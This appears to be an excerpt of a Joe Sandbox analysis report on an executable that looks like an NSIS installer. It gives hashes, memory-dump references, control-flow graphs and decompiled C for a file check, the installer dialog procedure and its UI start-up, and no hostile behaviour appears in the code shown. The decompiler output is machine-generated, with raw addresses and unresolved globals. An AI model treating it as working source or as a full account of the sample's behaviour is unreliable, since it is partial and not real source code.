                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                          • Instruction ID: 02c1e40b0c9780dd067322b7733c474732bd0f187a49f53fd7fd3c108ee94619
                                                          • Opcode Fuzzy Hash: 6ae840c17bc4cb012e3c6e2f9739eb08ea49decd14d2b7f73774d31e5ba5825a
                                                          • Instruction Fuzzy Hash: 7CF15570D04229CBDF28CFA8C8946ADBBB0FF44305F24816ED456BB281D7386A86DF45
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040699E(WCHAR* _a4) {
                                                          				void* _t2;
                                                          
                                                          				_t2 = FindFirstFileW(_a4, 0x426798); // executed
                                                          				if(_t2 == 0xffffffff) {
                                                          					return 0;
                                                          				}
                                                          				FindClose(_t2);
                                                          				return 0x426798;
                                                          			}




                                                          0x004069a9
                                                          0x004069b2
                                                          0x00000000
                                                          0x004069bf
                                                          0x004069b5
                                                          0x00000000

                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(766DFAA0,00426798,00425F50,00406088,00425F50,00425F50,00000000,00425F50,00425F50,766DFAA0,?,766DF560,00405D94,?,766DFAA0,766DF560), ref: 004069A9
                                                          • FindClose.KERNEL32(00000000), ref: 004069B5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                          • Instruction ID: 0ca7534fdffec89160a31ceabb6ef5ff718bfc83d1618d69d17f9e635378cbc3
                                                          • Opcode Fuzzy Hash: 1093b80bdde5f117a2aeaff90f04fc035896fcf98737a4a628a8a679d5dfa397
                                                          • Instruction Fuzzy Hash: 5ED012B15192205FC34057387E0C84B7A989F563317268A36B4AAF11E0CB348C3297AC
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 141 4040c5-4040d7 142 4040dd-4040e3 141->142 143 40423e-40424d 141->143 142->143 144 4040e9-4040f2 142->144 145 40429c-4042b1 143->145 146 40424f-40428a GetDlgItem * 2 call 4045c4 KiUserCallbackDispatcher call 40140b 143->146 149 4040f4-404101 SetWindowPos 144->149 150 404107-40410e 144->150 147 4042f1-4042f6 call 404610 145->147 148 4042b3-4042b6 145->148 167 40428f-404297 146->167 163 4042fb-404316 147->163 152 4042b8-4042c3 call 401389 148->152 153 4042e9-4042eb 148->153 149->150 155 404110-40412a ShowWindow 150->155 156 404152-404158 150->156 152->153 177 4042c5-4042e4 SendMessageW 152->177 153->147 162 404591 153->162 164 404130-404143 GetWindowLongW 155->164 165 40422b-404239 call 40462b 155->165 158 404171-404174 156->158 159 40415a-40416c DestroyWindow 156->159 169 404176-404182 SetWindowLongW 158->169 170 404187-40418d 158->170 166 40456e-404574 159->166 168 404593-40459a 162->168 173 404318-40431a call 40140b 163->173 174 40431f-404325 163->174 164->165 175 404149-40414c ShowWindow 164->175 165->168 166->162 180 404576-40457c 166->180 167->145 169->168 170->165 176 404193-4041a2 GetDlgItem 170->176 173->174 181 40432b-404336 174->181 182 40454f-404568 DestroyWindow EndDialog 174->182 175->156 184 4041c1-4041c4 176->184 185 4041a4-4041bb SendMessageW IsWindowEnabled 176->185 177->168 180->162 186 40457e-404587 ShowWindow 180->186 181->182 183 40433c-404389 call 4066a5 call 4045c4 * 3 GetDlgItem 181->183 182->166 213 404393-4043cf ShowWindow EnableWindow call 4045e6 EnableWindow 183->213 214 40438b-404390 183->214 188 4041c6-4041c7 184->188 189 4041c9-4041cc 184->189 185->162 185->184 186->162 191 4041f7-4041fc call 40459d 188->191 192 4041da-4041df 189->192 193 4041ce-4041d4 189->193 191->165 196 404215-404225 SendMessageW 192->196 198 4041e1-4041e7 192->198 193->196 197 4041d6-4041d8 193->197 196->165 197->191 201 4041e9-4041ef call 40140b 198->201 202 4041fe-404207 call 40140b 198->202 209 4041f5 201->209 202->165 211 404209-404213 202->211 209->191 211->209 217 4043d1-4043d2 213->217 218 4043d4 213->218 214->213 219 4043d6-404404 GetSystemMenu EnableMenuItem SendMessageW 217->219 218->219 220 404406-404417 SendMessageW 219->220 221 404419 219->221 222 40441f-40445e call 4045f9 call 4040a6 call 406668 lstrlenW call 4066a5 SetWindowTextW call 401389 220->222 221->222 222->163 233 404464-404466 222->233 233->163 234 40446c-404470 233->234 235 404472-404478 234->235 236 40448f-4044a3 DestroyWindow 234->236 235->162 237 40447e-404484 235->237 236->166 238 4044a9-4044d6 CreateDialogParamW 236->238 237->163 239 40448a 237->239 238->166 240 4044dc-404533 call 4045c4 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 238->240 239->162 240->162 245 404535-40454d ShowWindow call 404610 240->245 245->166
                                                          C-Code - Quality: 84%
                                                          			E004040C5(struct HWND__* _a4, intOrPtr _a8, int _a12, long _a16) {
                                                          				struct HWND__* _v28;
                                                          				void* _v84;
                                                          				void* _v88;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t34;
                                                          				signed int _t36;
                                                          				signed int _t38;
                                                          				struct HWND__* _t48;
                                                          				signed int _t67;
                                                          				struct HWND__* _t73;
                                                          				signed int _t86;
                                                          				struct HWND__* _t91;
                                                          				signed int _t99;
                                                          				int _t103;
                                                          				signed int _t117;
                                                          				int _t118;
                                                          				int _t122;
                                                          				signed int _t124;
                                                          				struct HWND__* _t127;
                                                          				struct HWND__* _t128;
                                                          				int _t129;
                                                          				intOrPtr _t130;
                                                          				long _t133;
                                                          				int _t135;
                                                          				int _t136;
                                                          				void* _t137;
                                                          				void* _t145;
                                                          
                                                          				_t130 = _a8;
                                                          				if(_t130 == 0x110 || _t130 == 0x408) {
                                                          					_t34 = _a12;
                                                          					_t127 = _a4;
                                                          					__eflags = _t130 - 0x110;
                                                          					 *0x423730 = _t34;
                                                          					if(_t130 == 0x110) {
                                                          						 *0x42a268 = _t127;
                                                          						 *0x423744 = GetDlgItem(_t127, 1);
                                                          						_t91 = GetDlgItem(_t127, 2);
                                                          						_push(0xffffffff);
                                                          						_push(0x1c);
                                                          						 *0x421710 = _t91;
                                                          						E004045C4(_t127);
                                                          						SetClassLongW(_t127, 0xfffffff2,  *0x429248); // executed
                                                          						 *0x42922c = E0040140B(4);
                                                          						_t34 = 1;
                                                          						__eflags = 1;
                                                          						 *0x423730 = 1;
                                                          					}
                                                          					_t124 =  *0x40a39c; // 0x0
                                                          					_t136 = 0;
                                                          					_t133 = (_t124 << 6) +  *0x42a280;
                                                          					__eflags = _t124;
                                                          					if(_t124 < 0) {
                                                          						L36:
                                                          						E00404610(0x40b);
                                                          						while(1) {
                                                          							_t36 =  *0x423730;
                                                          							 *0x40a39c =  *0x40a39c + _t36;
                                                          							_t133 = _t133 + (_t36 << 6);
                                                          							_t38 =  *0x40a39c; // 0x0
                                                          							__eflags = _t38 -  *0x42a284;
                                                          							if(_t38 ==  *0x42a284) {
                                                          								E0040140B(1);
                                                          							}
                                                          							__eflags =  *0x42922c - _t136;
                                                          							if( *0x42922c != _t136) {
                                                          								break;
                                                          							}
                                                          							__eflags =  *0x40a39c -  *0x42a284; // 0x0
                                                          							if(__eflags >= 0) {
                                                          								break;
                                                          							}
                                                          							_t117 =  *(_t133 + 0x14);
                                                          							E004066A5(_t117, _t127, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
                                                          							_push( *((intOrPtr*)(_t133 + 0x20)));
                                                          							_push(0xfffffc19);
                                                          							E004045C4(_t127);
                                                          							_push( *((intOrPtr*)(_t133 + 0x1c)));
                                                          							_push(0xfffffc1b);
                                                          							E004045C4(_t127);
                                                          							_push( *((intOrPtr*)(_t133 + 0x28)));
                                                          							_push(0xfffffc1a);
                                                          							E004045C4(_t127);
                                                          							_t48 = GetDlgItem(_t127, 3);
                                                          							__eflags =  *0x42a2ec - _t136;
                                                          							_v28 = _t48;
                                                          							if( *0x42a2ec != _t136) {
                                                          								_t117 = _t117 & 0x0000fefd | 0x00000004;
                                                          								__eflags = _t117;
                                                          							}
                                                          							ShowWindow(_t48, _t117 & 0x00000008);
                                                          							EnableWindow( *(_t137 + 0x34), _t117 & 0x00000100);
                                                          							E004045E6(_t117 & 0x00000002);
                                                          							_t118 = _t117 & 0x00000004;
                                                          							EnableWindow( *0x421710, _t118);
                                                          							__eflags = _t118 - _t136;
                                                          							if(_t118 == _t136) {
                                                          								_push(1);
                                                          							} else {
                                                          								_push(_t136);
                                                          							}
                                                          							EnableMenuItem(GetSystemMenu(_t127, _t136), 0xf060, ??);
                                                          							SendMessageW( *(_t137 + 0x3c), 0xf4, _t136, 1);
                                                          							__eflags =  *0x42a2ec - _t136;
                                                          							if( *0x42a2ec == _t136) {
                                                          								_push( *0x423744);
                                                          							} else {
                                                          								SendMessageW(_t127, 0x401, 2, _t136);
                                                          								_push( *0x421710);
                                                          							}
                                                          							E004045F9();
                                                          							E00406668(0x423748, E004040A6());
                                                          							E004066A5(0x423748, _t127, _t133,  &(0x423748[lstrlenW(0x423748)]),  *((intOrPtr*)(_t133 + 0x18)));
                                                          							SetWindowTextW(_t127, 0x423748);
                                                          							_push(_t136);
                                                          							_t67 = E00401389( *((intOrPtr*)(_t133 + 8)));
                                                          							__eflags = _t67;
                                                          							if(_t67 != 0) {
                                                          								continue;
                                                          							} else {
                                                          								__eflags =  *_t133 - _t136;
                                                          								if( *_t133 == _t136) {
                                                          									continue;
                                                          								}
                                                          								__eflags =  *(_t133 + 4) - 5;
                                                          								if( *(_t133 + 4) != 5) {
                                                          									DestroyWindow( *0x429238);
                                                          									 *0x422720 = _t133;
                                                          									__eflags =  *_t133 - _t136;
                                                          									if( *_t133 <= _t136) {
                                                          										goto L60;
                                                          									}
                                                          									_t73 = CreateDialogParamW( *0x42a260,  *_t133 +  *0x429240 & 0x0000ffff, _t127,  *(0x40a3a0 +  *(_t133 + 4) * 4), _t133);
                                                          									__eflags = _t73 - _t136;
                                                          									 *0x429238 = _t73;
                                                          									if(_t73 == _t136) {
                                                          										goto L60;
                                                          									}
                                                          									_push( *((intOrPtr*)(_t133 + 0x2c)));
                                                          									_push(6);
                                                          									E004045C4(_t73);
                                                          									GetWindowRect(GetDlgItem(_t127, 0x3fa), _t137 + 0x10);
                                                          									ScreenToClient(_t127, _t137 + 0x10);
                                                          									SetWindowPos( *0x429238, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
                                                          									_push(_t136);
                                                          									E00401389( *((intOrPtr*)(_t133 + 0xc)));
                                                          									__eflags =  *0x42922c - _t136;
                                                          									if( *0x42922c != _t136) {
                                                          										goto L63;
                                                          									}
                                                          									ShowWindow( *0x429238, 8);
                                                          									E00404610(0x405);
                                                          									goto L60;
                                                          								}
                                                          								__eflags =  *0x42a2ec - _t136;
                                                          								if( *0x42a2ec != _t136) {
                                                          									goto L63;
                                                          								}
                                                          								__eflags =  *0x42a2e0 - _t136;
                                                          								if( *0x42a2e0 != _t136) {
                                                          									continue;
                                                          								}
                                                          								goto L63;
                                                          							}
                                                          						}
                                                          						DestroyWindow( *0x429238); // executed
                                                          						 *0x42a268 = _t136;
                                                          						EndDialog(_t127,  *0x421f18);
                                                          						goto L60;
                                                          					} else {
                                                          						__eflags = _t34 - 1;
                                                          						if(_t34 != 1) {
                                                          							L35:
                                                          							__eflags =  *_t133 - _t136;
                                                          							if( *_t133 == _t136) {
                                                          								goto L63;
                                                          							}
                                                          							goto L36;
                                                          						}
                                                          						_push(0);
                                                          						_t86 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
                                                          						__eflags = _t86;
                                                          						if(_t86 == 0) {
                                                          							goto L35;
                                                          						}
                                                          						SendMessageW( *0x429238, 0x40f, 0, 1);
                                                          						__eflags =  *0x42922c;
                                                          						return 0 |  *0x42922c == 0x00000000;
                                                          					}
                                                          				} else {
                                                          					_t127 = _a4;
                                                          					_t136 = 0;
                                                          					if(_t130 == 0x47) {
                                                          						SetWindowPos( *0x423728, _t127, 0, 0, 0, 0, 0x13);
                                                          					}
                                                          					_t122 = _a12;
                                                          					if(_t130 != 5) {
                                                          						L8:
                                                          						if(_t130 != 0x40d) {
                                                          							__eflags = _t130 - 0x11;
                                                          							if(_t130 != 0x11) {
                                                          								__eflags = _t130 - 0x111;
                                                          								if(_t130 != 0x111) {
                                                          									goto L28;
                                                          								}
                                                          								_t135 = _t122 & 0x0000ffff;
                                                          								_t128 = GetDlgItem(_t127, _t135);
                                                          								__eflags = _t128 - _t136;
                                                          								if(_t128 == _t136) {
                                                          									L15:
                                                          									__eflags = _t135 - 1;
                                                          									if(_t135 != 1) {
                                                          										__eflags = _t135 - 3;
                                                          										if(_t135 != 3) {
                                                          											_t129 = 2;
                                                          											__eflags = _t135 - _t129;
                                                          											if(_t135 != _t129) {
                                                          												L27:
                                                          												SendMessageW( *0x429238, 0x111, _t122, _a16);
                                                          												goto L28;
                                                          											}
                                                          											__eflags =  *0x42a2ec - _t136;
                                                          											if( *0x42a2ec == _t136) {
                                                          												_t99 = E0040140B(3);
                                                          												__eflags = _t99;
                                                          												if(_t99 != 0) {
                                                          													goto L28;
                                                          												}
                                                          												 *0x421f18 = 1;
                                                          												L23:
                                                          												_push(0x78);
                                                          												L24:
                                                          												E0040459D();
                                                          												goto L28;
                                                          											}
                                                          											E0040140B(_t129);
                                                          											 *0x421f18 = _t129;
                                                          											goto L23;
                                                          										}
                                                          										__eflags =  *0x40a39c - _t136; // 0x0
                                                          										if(__eflags <= 0) {
                                                          											goto L27;
                                                          										}
                                                          										_push(0xffffffff);
                                                          										goto L24;
                                                          									}
                                                          									_push(_t135);
                                                          									goto L24;
                                                          								}
                                                          								SendMessageW(_t128, 0xf3, _t136, _t136);
                                                          								_t103 = IsWindowEnabled(_t128);
                                                          								__eflags = _t103;
                                                          								if(_t103 == 0) {
                                                          									L63:
                                                          									return 0;
                                                          								}
                                                          								goto L15;
                                                          							}
                                                          							SetWindowLongW(_t127, _t136, _t136);
                                                          							return 1;
                                                          						}
                                                          						DestroyWindow( *0x429238);
                                                          						 *0x429238 = _t122;
                                                          						L60:
                                                          						_t145 =  *0x425748 - _t136; // 0x0
                                                          						if(_t145 == 0 &&  *0x429238 != _t136) {
                                                          							ShowWindow(_t127, 0xa);
                                                          							 *0x425748 = 1;
                                                          						}
                                                          						goto L63;
                                                          					} else {
                                                          						asm("sbb eax, eax");
                                                          						ShowWindow( *0x423728,  ~(_t122 - 1) & 0x00000005);
                                                          						if(_t122 != 2 || (GetWindowLongW(_t127, 0xfffffff0) & 0x21010000) != 0x1000000) {
                                                          							L28:
                                                          							return E0040462B(_a8, _t122, _a16);
                                                          						} else {
                                                          							ShowWindow(_t127, 4);
                                                          							goto L8;
                                                          						}
                                                          					}
                                                          				}
                                                          			}
































                                                          0x004040d0
                                                          0x004040d7
                                                          0x0040423e
                                                          0x00404242
                                                          0x00404246
                                                          0x00404248
                                                          0x0040424d
                                                          0x00404258
                                                          0x00404263
                                                          0x00404268
                                                          0x0040426a
                                                          0x0040426c
                                                          0x0040426f
                                                          0x00404274
                                                          0x00404282
                                                          0x0040428f
                                                          0x00404296
                                                          0x00404296
                                                          0x00404297
                                                          0x00404297
                                                          0x0040429c
                                                          0x004042a2
                                                          0x004042a9
                                                          0x004042af
                                                          0x004042b1
                                                          0x004042f1
                                                          0x004042f6
                                                          0x004042fb
                                                          0x004042fb
                                                          0x00404300
                                                          0x00404309
                                                          0x0040430b
                                                          0x00404310
                                                          0x00404316
                                                          0x0040431a
                                                          0x0040431a
                                                          0x0040431f
                                                          0x00404325
                                                          0x00000000
                                                          0x00000000
                                                          0x00404330
                                                          0x00404336
                                                          0x00000000
                                                          0x00000000
                                                          0x0040433f
                                                          0x00404347
                                                          0x0040434c
                                                          0x0040434f
                                                          0x00404355
                                                          0x0040435a
                                                          0x0040435d
                                                          0x00404363
                                                          0x00404368
                                                          0x0040436b
                                                          0x00404371
                                                          0x00404379
                                                          0x0040437f
                                                          0x00404385
                                                          0x00404389
                                                          0x00404390
                                                          0x00404390
                                                          0x00404390
                                                          0x0040439a
                                                          0x004043ac
                                                          0x004043b8
                                                          0x004043bd
                                                          0x004043c7
                                                          0x004043cd
                                                          0x004043cf
                                                          0x004043d4
                                                          0x004043d1
                                                          0x004043d1
                                                          0x004043d1
                                                          0x004043e4
                                                          0x004043fc
                                                          0x004043fe
                                                          0x00404404
                                                          0x00404419
                                                          0x00404406
                                                          0x0040440f
                                                          0x00404411
                                                          0x00404411
                                                          0x0040441f
                                                          0x00404430
                                                          0x00404446
                                                          0x0040444d
                                                          0x00404453
                                                          0x00404457
                                                          0x0040445c
                                                          0x0040445e
                                                          0x00000000
                                                          0x00404464
                                                          0x00404464
                                                          0x00404466
                                                          0x00000000
                                                          0x00000000
                                                          0x0040446c
                                                          0x00404470
                                                          0x00404495
                                                          0x0040449b
                                                          0x004044a1
                                                          0x004044a3
                                                          0x00000000
                                                          0x00000000
                                                          0x004044c9
                                                          0x004044cf
                                                          0x004044d1
                                                          0x004044d6
                                                          0x00000000
                                                          0x00000000
                                                          0x004044dc
                                                          0x004044df
                                                          0x004044e2
                                                          0x004044f9
                                                          0x00404505
                                                          0x0040451e
                                                          0x00404524
                                                          0x00404528
                                                          0x0040452d
                                                          0x00404533
                                                          0x00000000
                                                          0x00000000
                                                          0x0040453d
                                                          0x00404548
                                                          0x00000000
                                                          0x00404548
                                                          0x00404472
                                                          0x00404478
                                                          0x00000000
                                                          0x00000000
                                                          0x0040447e
                                                          0x00404484
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x0040448a
                                                          0x0040445e
                                                          0x00404555
                                                          0x00404561
                                                          0x00404568
                                                          0x00000000
                                                          0x004042b3
                                                          0x004042b3
                                                          0x004042b6
                                                          0x004042e9
                                                          0x004042e9
                                                          0x004042eb
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x004042eb
                                                          0x004042b8
                                                          0x004042bc
                                                          0x004042c1
                                                          0x004042c3
                                                          0x00000000
                                                          0x00000000
                                                          0x004042d3
                                                          0x004042db
                                                          0x00000000
                                                          0x004042e1
                                                          0x004040e9
                                                          0x004040e9
                                                          0x004040ed
                                                          0x004040f2
                                                          0x00404101
                                                          0x00404101
                                                          0x00404107
                                                          0x0040410e
                                                          0x00404152
                                                          0x00404158
                                                          0x00404171
                                                          0x00404174
                                                          0x00404187
                                                          0x0040418d
                                                          0x00000000
                                                          0x00000000
                                                          0x00404193
                                                          0x0040419e
                                                          0x004041a0
                                                          0x004041a2
                                                          0x004041c1
                                                          0x004041c1
                                                          0x004041c4
                                                          0x004041c9
                                                          0x004041cc
                                                          0x004041dc
                                                          0x004041dd
                                                          0x004041df
                                                          0x00404215
                                                          0x00404225
                                                          0x00000000
                                                          0x00404225
                                                          0x004041e1
                                                          0x004041e7
                                                          0x00404200
                                                          0x00404205
                                                          0x00404207
                                                          0x00000000
                                                          0x00000000
                                                          0x00404209
                                                          0x004041f5
                                                          0x004041f5
                                                          0x004041f7
                                                          0x004041f7
                                                          0x00000000
                                                          0x004041f7
                                                          0x004041ea
                                                          0x004041ef
                                                          0x00000000
                                                          0x004041ef
                                                          0x004041ce
                                                          0x004041d4
                                                          0x00000000
                                                          0x00000000
                                                          0x004041d6
                                                          0x00000000
                                                          0x004041d6
                                                          0x004041c6
                                                          0x00000000
                                                          0x004041c6
                                                          0x004041ac
                                                          0x004041b3
                                                          0x004041b9
                                                          0x004041bb
                                                          0x00404591
                                                          0x00000000
                                                          0x00404591
                                                          0x00000000
                                                          0x004041bb
                                                          0x00404179
                                                          0x00000000
                                                          0x00404181
                                                          0x00404160
                                                          0x00404166
                                                          0x0040456e
                                                          0x0040456e
                                                          0x00404574
                                                          0x00404581
                                                          0x00404587
                                                          0x00404587
                                                          0x00000000
                                                          0x00404110
                                                          0x00404115
                                                          0x00404121
                                                          0x0040412a
                                                          0x0040422b
                                                          0x00000000
                                                          0x00404149
                                                          0x0040414c
                                                          0x00000000
                                                          0x0040414c
                                                          0x0040412a
                                                          0x0040410e

                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00404101
                                                          • ShowWindow.USER32(?), ref: 00404121
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00404133
                                                          • ShowWindow.USER32(?,00000004), ref: 0040414C
                                                          • DestroyWindow.USER32 ref: 00404160
                                                          • SetWindowLongW.USER32 ref: 00404179
                                                          • GetDlgItem.USER32 ref: 00404198
                                                          • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 004041AC
                                                          • IsWindowEnabled.USER32(00000000), ref: 004041B3
                                                          • GetDlgItem.USER32 ref: 0040425E
                                                          • GetDlgItem.USER32 ref: 00404268
                                                          • KiUserCallbackDispatcher.NTDLL(?,000000F2,?), ref: 00404282
                                                          • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 004042D3
                                                          • GetDlgItem.USER32 ref: 00404379
                                                          • ShowWindow.USER32(00000000,?), ref: 0040439A
                                                          • EnableWindow.USER32(?,?), ref: 004043AC
                                                          • EnableWindow.USER32(?,?), ref: 004043C7
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 004043DD
                                                          • EnableMenuItem.USER32 ref: 004043E4
                                                          • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 004043FC
                                                          • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040440F
                                                          • lstrlenW.KERNEL32(00423748,?,00423748,00000000), ref: 00404439
                                                          • SetWindowTextW.USER32(?,00423748), ref: 0040444D
                                                          • ShowWindow.USER32(?,0000000A), ref: 00404581
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.322461712.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.322455257.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322470834.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322480782.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.322520599.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSendShow$Enable$LongMenu$CallbackDestroyDispatcherEnabledSystemTextUserlstrlen
                                                          • String ID: H7B
                                                          • API String ID: 2475350683-2300413410
                                                          • Opcode ID: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                          • Instruction ID: 1d4a55fced449df2e2a9dfc159c1061f424388fbea236c5341ec002980a30b6c
                                                          • Opcode Fuzzy Hash: b499a380baa1669b9d39d87f51061d2fd0c3acf201e93ffa24678bb3f42416dd
                                                          • Instruction Fuzzy Hash: C0C1C2B1600604FBDB216F61EE85E2A3B78EB85745F40097EF781B51F0CB3958529B2E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 248 403d17-403d2f call 406a35 251 403d31-403d41 call 4065af 248->251 252 403d43-403d7a call 406536 248->252 261 403d9d-403dc6 call 403fed call 40603f 251->261 257 403d92-403d98 lstrcatW 252->257 258 403d7c-403d8d call 406536 252->258 257->261 258->257 266 403e58-403e60 call 40603f 261->266 267 403dcc-403dd1 261->267 273 403e62-403e69 call 4066a5 266->273 274 403e6e-403e93 LoadImageW 266->274 267->266 269 403dd7-403dff call 406536 267->269 269->266 275 403e01-403e05 269->275 273->274 277 403f14-403f1c call 40140b 274->277 278 403e95-403ec5 RegisterClassW 274->278 279 403e17-403e23 lstrlenW 275->279 280 403e07-403e14 call 405f64 275->280 291 403f26-403f31 call 403fed 277->291 292 403f1e-403f21 277->292 281 403fe3 278->281 282 403ecb-403f0f SystemParametersInfoW CreateWindowExW 278->282 286 403e25-403e33 lstrcmpiW 279->286 287 403e4b-403e53 call 405f37 call 406668 279->287 280->279 285 403fe5-403fec 281->285 282->277 286->287 290 403e35-403e3f GetFileAttributesW 286->290 287->266 294 403e41-403e43 290->294 295 403e45-403e46 call 405f83 290->295 301 403f37-403f51 ShowWindow call 4069c5 291->301 302 403fba-403fc2 call 40579d 291->302 292->285 294->287 294->295 295->287 307 403f53-403f58 call 4069c5 301->307 308 403f5d-403f6f GetClassInfoW 301->308 309 403fc4-403fca 302->309 310 403fdc-403fde call 40140b 302->310 307->308 313 403f71-403f81 GetClassInfoW RegisterClassW 308->313 314 403f87-403faa DialogBoxParamW call 40140b 308->314 309->292 315 403fd0-403fd7 call 40140b 309->315 310->281 313->314 319 403faf-403fb8 call 403c67 314->319 315->292 319->285
                                                          C-Code - Quality: 96%
                                                          			E00403D17(void* __eflags) {
                                                          				intOrPtr _v4;
                                                          				intOrPtr _v8;
                                                          				int _v12;
                                                          				void _v16;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				intOrPtr* _t22;
                                                          				void* _t30;
                                                          				void* _t32;
                                                          				int _t33;
                                                          				void* _t36;
                                                          				int _t39;
                                                          				int _t40;
                                                          				int _t44;
                                                          				short _t63;
                                                          				WCHAR* _t65;
                                                          				signed char _t69;
                                                          				WCHAR* _t76;
                                                          				intOrPtr _t82;
                                                          				WCHAR* _t87;
                                                          
                                                          				_t82 =  *0x42a270;
                                                          				_t22 = E00406A35(2);
                                                          				_t90 = _t22;
                                                          				if(_t22 == 0) {
                                                          					_t76 = 0x423748;
                                                          					L"1033" = 0x30;
                                                          					 *0x437002 = 0x78;
                                                          					 *0x437004 = 0;
                                                          					E00406536(_t78, __eflags, 0x80000001, L"Control Panel\\Desktop\\ResourceLocale", 0, 0x423748, 0);
                                                          					__eflags =  *0x423748;
                                                          					if(__eflags == 0) {
                                                          						E00406536(_t78, __eflags, 0x80000003, L".DEFAULT\\Control Panel\\International",  &M004083D4, 0x423748, 0);
                                                          					}
                                                          					lstrcatW(L"1033", _t76);
                                                          				} else {
                                                          					E004065AF(L"1033",  *_t22() & 0x0000ffff);
                                                          				}
                                                          				E00403FED(_t78, _t90);
                                                          				 *0x42a2e0 =  *0x42a278 & 0x00000020;
                                                          				 *0x42a2fc = 0x10000;
                                                          				if(E0040603F(_t90, 0x435800) != 0) {
                                                          					L16:
                                                          					if(E0040603F(_t98, 0x435800) == 0) {
                                                          						E004066A5(_t76, 0, _t82, 0x435800,  *((intOrPtr*)(_t82 + 0x118)));
                                                          					}
                                                          					_t30 = LoadImageW( *0x42a260, 0x67, 1, 0, 0, 0x8040); // executed
                                                          					 *0x429248 = _t30;
                                                          					if( *((intOrPtr*)(_t82 + 0x50)) == 0xffffffff) {
                                                          						L21:
                                                          						if(E0040140B(0) == 0) {
                                                          							_t32 = E00403FED(_t78, __eflags);
                                                          							__eflags =  *0x42a300;
                                                          							if( *0x42a300 != 0) {
                                                          								_t33 = E0040579D(_t32, 0);
                                                          								__eflags = _t33;
                                                          								if(_t33 == 0) {
                                                          									E0040140B(1);
                                                          									goto L33;
                                                          								}
                                                          								__eflags =  *0x42922c;
                                                          								if( *0x42922c == 0) {
                                                          									E0040140B(2);
                                                          								}
                                                          								goto L22;
                                                          							}
                                                          							ShowWindow( *0x423728, 5); // executed
                                                          							_t39 = E004069C5("RichEd20"); // executed
                                                          							__eflags = _t39;
                                                          							if(_t39 == 0) {
                                                          								E004069C5("RichEd32");
                                                          							}
                                                          							_t87 = L"RichEdit20W";
                                                          							_t40 = GetClassInfoW(0, _t87, 0x429200);
                                                          							__eflags = _t40;
                                                          							if(_t40 == 0) {
                                                          								GetClassInfoW(0, L"RichEdit", 0x429200);
